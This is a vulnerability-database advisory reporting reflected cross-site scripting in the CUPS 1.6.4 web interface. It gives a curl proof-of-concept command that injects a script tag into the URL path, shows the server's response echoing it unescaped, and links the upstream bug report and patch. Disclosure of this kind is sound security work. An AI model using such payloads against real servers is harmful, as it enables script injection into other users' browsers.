CUPS 1.6.4 web interface XSS

2014.04.14

Credit: Alex

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

There seems to be XSS possible when CUPS web-interface is accessed like: http://cups-server-name:631/<SCRIPT>whatever</SCRIPT>.shtml
I cannot reproduce it with CUPS 1.7.1, but CUPS 1.6.4 is vulnerable:
Easy test:
$ curl "http://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Upgrade Required - CUPS v1.6.4</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml">
</HEAD>
<BODY>
<H1>Upgrade Required</H1>
<P>You must access this page using the URL <A HREF="https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml">https://192.168.0.1:631/<SCRIPT>alert('document.domain='+document
.domain)</SCRIPT>.shtml</A>.</P>
</BODY>
</HTML>

References:

http://www.cups.org/str.php?L4356

http://www.cups.org/strfiles.php/3268/str4356.patch

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CUPS 1.6.4 web interface XSS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.